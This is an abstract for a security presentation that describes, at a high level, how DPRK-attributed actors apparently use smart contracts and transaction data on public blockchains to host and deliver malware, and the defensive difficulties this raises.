In this presentation, I provide a overview of how blockchain technologies are being leveraged for malware delivery. Using smart contracts, transaction data, and cross-chain mechanisms, actors can host, deliver, and maintain payloads with stealth and persistence.

Attacks often start with social engineering via Telegram, LinkedIn, or GitHub, tricking victims into downloading repositories containing obfuscated JavaScript loaders. The loaders decode hidden blockchain addresses, keys, and API endpoints, then retrieve malicious payloads from public chains like Ethereum, BNB Smart Chain, TRON, and Aptos.

Three delivery methods are highlighted:
- EtherHiding: Payloads embedded in smart-contract storage, retrievable without logs or on-chain traces.
- TxDataHiding: Payload fragments hidden in historical transactions.
- Cross-Chain TxDataHiding: Multi-chain pointers ensure redundancy and fallback.

Payloads execute entirely in memory, deploying modular capabilities including credential theft, browser and crypto wallet harvesting, and remote access. The campaign is attributed to DPRK threat actors—sometimes called ‘Famous Chollima’ - though some pre-attack and remote-access infrastructure uses Russian hosting, highlighting the complexity of attribution. Even with this mixed infrastructure, the operational behavior—including targeting crypto wallets and harvesting sensitive data—aligns with DPRK’s typical objectives.

The session also covers defensive challenges: limited visibility, traffic indistinguishable from legitimate blockchain activity, and difficulty blocking malicious endpoints without disrupting operations. Attendees will gain a high-level understanding of blockchain-based malware, emerging Web3 threats, and detection limitations.